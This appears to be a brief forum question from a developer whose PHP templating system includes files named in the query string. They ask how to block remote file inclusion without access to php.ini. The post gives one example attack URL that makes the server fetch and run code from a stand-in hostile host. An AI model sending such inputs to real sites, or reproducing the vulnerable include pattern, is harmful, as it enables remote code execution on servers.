For security reasons, I want to prevent files from outside of my domain from being included, is there any way to do this programmatically?
I don't have access to php.ini on the site I'm creating, and the templating system in place uses index.php?includefile.php
But right now, you can put a full URL in afterwards (index.php?http://evilsite.com/destructivecode.php) and it'll run.
Any way to prevent this? Thanks!
